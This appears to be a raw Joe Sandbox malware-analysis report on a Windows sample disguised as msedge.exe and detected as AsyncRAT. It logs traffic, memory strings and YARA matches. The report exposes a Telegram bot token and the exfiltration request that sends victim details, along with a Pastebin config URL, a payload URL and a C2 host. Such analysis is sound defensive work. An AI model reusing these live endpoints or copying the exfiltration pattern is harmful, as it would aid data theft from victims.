Source: global traffic	HTTP traffic detected: GET /raw/ZnhxAV6a HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 147.185.221.24 147.185.221.24

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/ZnhxAV6a HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: upon-forming.gl.at.ply.gg
Source: global traffic	DNS traffic detected: DNS query: i.ibb.co

Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.ibb.co
Source: msedge.exe, 00000000.00000002.3551685304.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: msedge.exe, msedge.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: msedge.exe, 00000000.00000002.3551685304.0000000002A4B000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ibb.co
Source: msedge.exe, msedge.exe.0.dr	String found in binary or memory: https://i.ibb.co/Dwrj41N/Image.png
Source: msedge.exe, 0000000B.00000002.3530961194.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZnhxAV6a

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50062 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Source: C:\Users\user\Desktop\msedge.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\msedge.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: msedge.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\msedge.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B888BF6	0_2_00007FFD9B888BF6
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B881567	0_2_00007FFD9B881567
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B8899A2	0_2_00007FFD9B8899A2
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B881FB9	0_2_00007FFD9B881FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 3_2_00007FFD9B881567	3_2_00007FFD9B881567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 3_2_00007FFD9B881FB9	3_2_00007FFD9B881FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 4_2_00007FFD9B8A1567	4_2_00007FFD9B8A1567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 4_2_00007FFD9B8A1FB9	4_2_00007FFD9B8A1FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 11_2_00007FFD9B891567	11_2_00007FFD9B891567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 11_2_00007FFD9B891FB9	11_2_00007FFD9B891FB9

Source: C:\Users\user\Desktop\msedge.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484

Source: msedge.exe, 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.e- vs msedge.exe
Source: msedge.exe, 00000000.00000000.1649864905.0000000000616000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe.0.dr	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe

Source: msedge.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: msedge.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: msedge.exe, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'

